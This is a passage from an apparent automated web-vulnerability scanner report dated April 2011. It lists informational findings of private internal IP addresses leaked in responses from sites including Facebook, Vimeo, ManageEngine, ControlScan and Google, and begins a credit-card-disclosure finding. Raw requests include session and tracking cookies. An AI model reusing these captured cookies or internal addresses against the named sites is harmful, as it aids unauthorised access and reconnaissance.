Connection: close

CWS    d...x...Mo.I.........c{.6....'q....$...........HY.
..;..<.3cu..|.@.......>..8,..,.\.....q........8s..4.].T.SU.2.c    >.........HD6....w.......F..~7;.+>.....$.....J.8w..'....\...c..................
...[SNIP]...
28.5. http://my.webalta.ru/public/engine/settings.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://my.webalta.ru
Path:   /public/engine/settings.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /public/engine/settings.js HTTP/1.1
Host: my.webalta.ru
Proxy-Connection: keep-alive
Referer: http://my.webalta.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165308000.1303741218.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); pogoda_reg=10290; __utma=165308000.73118877.1303741218.1303741218.1303741218.1; __utmc=165308000; __utmb=165308000.3.10.1303741218

Response

HTTP/1.1 200 OK
Server: nginx/0.7.61
Date: Mon, 25 Apr 2011 14:27:12 GMT
Content-Type: application/x-javascript
Content-Length: 3396
Last-Modified: Tue, 23 Dec 2008 15:27:11 GMT
Connection: keep-alive
Keep-Alive: timeout=20
Expires: Mon, 16 May 2011 14:27:12 GMT
Cache-Control: max-age=1814400
Accept-Ranges: bytes

...
var fw={};var block={};var page={}; var page_load={}; var block_prop={};var g_st={};
var save_key = false;
function f_new(name)
{
       this.Modules={};
   
}
var Catalog = {};
var Catalog_ =
...[SNIP]...
_block = false;//* ............ .......... ...... .............. .......................... ........................
var Move_html="";

var mode;
var g_url_pr = 'my.webalta.ru';
//var g_url_pr = '192.168.140.29';
var g_url_ = 'http://'+g_url_pr+'/public/engine/widget/';
var g_url_cat = 'http://'+g_url_pr+'/public/engine/catalog/';
var g_url_proxy = 'http://'+g_url_pr+'/feed/l.php?url=';
var g_url_xslt =
...[SNIP]...
28.6. http://player.vimeo.com/video/22043447  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://player.vimeo.com
Path:   /video/22043447

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /video/22043447?title=0&byline=0&portrait=0&color=2f85be HTTP/1.1
Host: player.vimeo.com
Proxy-Connection: keep-alive
Referer: http://www.customermagnetism.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=256147786.1303575918.2.2.utmcsr=sailinganarchy.com|utmccn=(referral)|utmcmd=referral|utmcct=/index_page1.php; __utma=256147786.658057560.1303432520.1303432520.1303575918.2

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 16:03:32 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
X-Server: 10.90.6.246
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Expires: Fri, 25 Feb 1983 09:30:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 7111

<!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><title>Untitled</title><!--[if lt IE 9]><style>.a.d .ab {display: block;}.a.d .bh {background: #000;filter: alpha(opacity='70');}</style><![e
...[SNIP]...
28.7. http://static.ak.fbcdn.net/connect/xd_proxy.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /connect/xd_proxy.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /connect/xd_proxy.php?version=0 HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3011c9318%26origin%3Dhttp%253A%252F%252Fwww.eset.com%252Ff27180d43%26relation%3Dparent.parent%26transport%3Dpostmessage&font=segoe%20ui&href=http%3A%2F%2Fwww.facebook.com%2Fesetusa&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=90
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.30.145.199
X-Cnection: close
Vary: Accept-Encoding
Cache-Control: public, max-age=270
Expires: Mon, 25 Apr 2011 14:57:09 GMT
Date: Mon, 25 Apr 2011 14:52:39 GMT
Connection: close
Content-Length: 3017

<!doctype html>
<html>
<head>
<title>XD Proxy</title>
</head>
<body onload="doFragmentSend()">
<div
id="swf_holder"
style="position: absolute; top: -10000px; width: 1px; heig
...[SNIP]...
28.8. http://static.ak.fbcdn.net/connect/xd_proxy.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /connect/xd_proxy.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /connect/xd_proxy.php?version=0 HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1d0bfa794%26origin%3Dhttp%253A%252F%252Fwww.eset.com%252Ff259c7ddf8%26relation%3Dparent.parent%26transport%3Dpostmessage&font=segoe%20ui&href=http%3A%2F%2Fwww.facebook.com%2Fesetusa&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=90
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.138.16.184
Vary: Accept-Encoding
Cache-Control: public, max-age=911
Expires: Mon, 25 Apr 2011 13:07:59 GMT
Date: Mon, 25 Apr 2011 12:52:48 GMT
Connection: close
Content-Length: 3017

<!doctype html>
<html>
<head>
<title>XD Proxy</title>
</head>
<body onload="doFragmentSend()">
<div
id="swf_holder"
style="position: absolute; top: -10000px; width: 1px; heig
...[SNIP]...
28.9. http://static.ak.fbcdn.net/rsrc.php/v1/zX/r/i_oIVTKMYsL.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/zX/r/i_oIVTKMYsL.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/zX/r/i_oIVTKMYsL.png HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/home/smart-security
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 92
Content-Type: image/png
Last-Modified: Mon, 15 Mar 2010 07:57:45 -0700
X-Powered-By: HPHP
X-FB-Server: 10.138.16.185
Cache-Control: public, max-age=27993760
Expires: Wed, 14 Mar 2012 14:56:08 GMT
Date: Mon, 25 Apr 2011 14:53:28 GMT
Connection: close

.PNG
.
...IHDR..............o&....#IDAT.[c...v.....].....A..\.Y.,..@....\.-.    .....IEND.B`.
28.10. http://tools.manageengine.com/forums/me/forum.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tools.manageengine.com
Path:   /forums/me/forum.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /forums/me/forum.php?limit=5&char=25 HTTP/1.1
Host: tools.manageengine.com
Proxy-Connection: keep-alive
Referer: http://www.manageengine.com/meforum.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=208542606.1303732848.2.2.utmgclid=CL-9_6TPt6gCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=208542606.1253035426.1303526945.1303526945.1303732848.2; __utmc=208542606; __utmb=208542606.13.10.1303732848

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:14:02 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 51202

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<style>body{}
.forumTitle{float:left;margin-top:-12px;padding-left:10px;font:11px Verdana, Arial, Helvetica, sans-serif;color:#000;line-height:22px;t
...[SNIP]...
<a href='http://10.0.0.90:8080/WorkOrder.do?woMode=viewWO&amp;woID=1951' target='_blank'>http://10.0.0.90:8080/WorkOrder.do?woMode=viewWO&amp;woID=1951<\/a>
...[SNIP]...
28.11. http://tools.manageengine.com/forums/security-manager/forum.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tools.manageengine.com
Path:   /forums/security-manager/forum.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /forums/security-manager/forum.php?limit=5&char=25 HTTP/1.1
Host: tools.manageengine.com
Proxy-Connection: keep-alive
Referer: http://www.manageengine.com/products/security-manager/security-manager-forum.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=208542606.1303732848.2.2.utmgclid=CL-9_6TPt6gCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=208542606.1253035426.1303526945.1303526945.1303732848.2; __utmc=208542606; __utmb=208542606.4.10.1303732848

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:11:53 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 64425

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<style>
body
{
}
.forumTitle{float:left; margin-top:-12px; padding-left:10px; font:11px Verdana, Arial, Helvetica, sans-serif;color:#000;line-height:
...[SNIP]...
<a style=\"font-style: italic;\" href=\"http://192.168.118.128:6262//store?f=300132-jre-6u23-windows-i586-s.exe$1,\" target=\"_blank\">http://192.168.118.128:6262//store?f=300132-jre-6u23-windows-i586-s.exe$1<\/a>
...[SNIP]...
28.12. https://www.controlscan.com/checkout.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.controlscan.com
Path:   /checkout.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /checkout.php HTTP/1.1
Host: www.controlscan.com
Connection: keep-alive
Referer: https://www.controlscan.com/shoppingcart.php?itemsadded=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=00f4el4lcuvnop42qop34mkqh4; __utmz=180386997.1303732833.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fpc1000725800122=O1TwOju5|4ybarsbLaa|fses1000725800122=|4ybarsbLaa|O1TwOju5|fvis1000725800122=Zj1odHRwcyUzQSUyRiUyRnd3dy5jb250cm9sc2Nhbi5jb20lMkYmYj1Db250cm9sU2NhbiUyMFBDSSUyMENvbXBsaWFuY2UlMjAlN0MlMjBHZXQlMjBQQ0klMjBDb21wbGlhbnQlMjBUb2RheSE=|8MYMHMsoss|8MYMHMsoss|8MYMHMsoss|8|8MYMHMsoss|8MYMHMsoss; __utma=180386997.730761609.1303732833.1303732833.1303735963.2; __utmc=180386997; __utmb=180386997.3.10.1303735963; com.vtrenz.iMAWebCookie=49379056-69d2-6147-26ad-65d29c6189eb; com.vtrenz.iMA.session=3cd51bd8-477e-ec0e-65cc-8ca3a9c2b5ac

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:55:08 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="PHY DEM ONL STA PUR NAV COM OUR DELo CUR ADM DEV IDC COR BUS DSP"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 49061

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
</textarea> (Ex: www.yoursite.com or 192.168.0.15)

<hr />
...[SNIP]...
28.13. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3011c9318%26origin%3Dhttp%253A%252F%252Fwww.eset.com%252Ff27180d43%26relation%3Dparent.parent%26transport%3Dpostmessage&font=segoe%20ui&href=http%3A%2F%2Fwww.facebook.com%2Fesetusa&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=90 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.53.103.81
X-Cnection: close
Date: Mon, 25 Apr 2011 14:52:39 GMT
Content-Length: 8110

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
28.14. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3cde351e4%26origin%3Dhttp%253A%252F%252Fwww.eset.com%252Ff28ffd8ef%26relation%3Dparent.parent%26transport%3Dpostmessage&font=segoe%20ui&href=http%3A%2F%2Fwww.facebook.com%2Fesetusa&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=90 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/business/server-security/linux-file
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.198.128
X-Cnection: close
Date: Mon, 25 Apr 2011 12:58:51 GMT
Content-Length: 8147

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
28.15. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df390c5570%26origin%3Dhttp%253A%252F%252Fwww.eset.com%252Ff6001b114%26relation%3Dparent.parent%26transport%3Dpostmessage&font=segoe%20ui&href=http%3A%2F%2Fwww.facebook.com%2Fesetusa&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=90 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.53.52.27
X-Cnection: close
Date: Mon, 25 Apr 2011 14:52:31 GMT
Content-Length: 8107

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
28.16. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df31664749%26origin%3Dhttp%253A%252F%252Fwww.eset.com%252Ff722d66cc%26relation%3Dparent.parent%26transport%3Dpostmessage&font=segoe%20ui&href=http%3A%2F%2Fwww.facebook.com%2Fesetusa&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=90 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/store
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.215.116
X-Cnection: close
Date: Mon, 25 Apr 2011 12:59:01 GMT
Content-Length: 8112

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
28.17. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1d0bfa794%26origin%3Dhttp%253A%252F%252Fwww.eset.com%252Ff259c7ddf8%26relation%3Dparent.parent%26transport%3Dpostmessage&font=segoe%20ui&href=http%3A%2F%2Fwww.facebook.com%2Fesetusa&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=90 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/business/products?CMP=KNC-g-nbag&gclid=CLzn0qLPt6gCFQl_5Qod4S-RCA
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.150.41
X-Cnection: close
Date: Mon, 25 Apr 2011 12:52:48 GMT
Content-Length: 8179

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
28.18. http://www.google.com/sdch/rU20-FBA.dct  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /sdch/rU20-FBA.dct

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /sdch/rU20-FBA.dct HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:TM=1303071569:LM=1303430315:S=G3Eo9Ou469J3cHp7; NID=46=G6tAQMMliMdgbUozp0g-12zJ4nIr9W3lVB7VLX4tvICbyeI1deRYnF0ETnjMaFRcDOw858z9ldTQARgCwUuLQTXPs03YWNQDMeYsf58qFzWq4-g9gJ1mhwHeRmKdbRzf
If-Modified-Since: Mon, 25 Apr 2011 04:46:21 GMT

Response

HTTP/1.1 200 OK
Content-Type: application/x-sdch-dictionary
Last-Modified: Mon, 25 Apr 2011 14:47:31 GMT
Date: Mon, 25 Apr 2011 15:37:47 GMT
Expires: Mon, 25 Apr 2011 15:37:47 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 96018

Domain: .google.com
Path: /search

<!doctype html><head><title>used car<!doctype html><head><title>direct - Google Search</title><script>window.google={kEI:" WJ_5AK2N-RqwM",kEXPI:"25907,2
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache: &hl=en&ct=clnk&gl=us&source=www.google.com','','','',' &amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','1','','0C
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache: mXEkS0TMcmsJ:www.edmunds.com/used-cars/+used+car &amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','1','','0CD
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache:J:explore.live.com/windows-live- onmousedown="return clk(this.href,'','','',' gQqwMoA </a>
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache:J:www.thecarconnection.com/make/new,J:www.motortrend.com/new_cars/01/y4a-lQGHU2cJ:www.vehix.com/+used+car5Ke98xsxxpYJ:www.whitepages.com/person+ &amp;hl=en&amp;ct=clnk&amp;
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache: contact_us+direct en.wikipedia.org/wiki/DirecTV+direct onmousedown="return clk(this.href,'','','',' 2','','0CD')">
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache: www.carsdirect.com/used_cars/search this.href,'','','','1','','0C directv.com/DTVAPP/content/My_Account OsWJ_5AK2N-RqwM&amp;ved=0CH </a>
...[SNIP]...
<a href="/search?hl=en&amp;q=http://172.31.196.197:8888/search?q=cache: &amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','',' 7','','0C ')">
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache:yTixchY6gV0J:www.dish-television.com/+direct rZQjSq2ux10J:translate.reference.com/+ &amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache: this.href,'','','',' ')">
...[SNIP]...
29. Credit card numbers disclosed  previous  next
There are 3 instances of this issue:

29.1. http://ad.doubleclick.net/adj/lj.homepage/loggedout  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/lj.homepage/loggedout

Issue detail

The following credit card number was disclosed in the response:

Request

GET /adj/lj.homepage/loggedout;a=1;r=0;w=0;c=se;pt=se;vert=_code;sz=300x250;pos=r;tile=3;ord=2623414837? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.livejournal.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
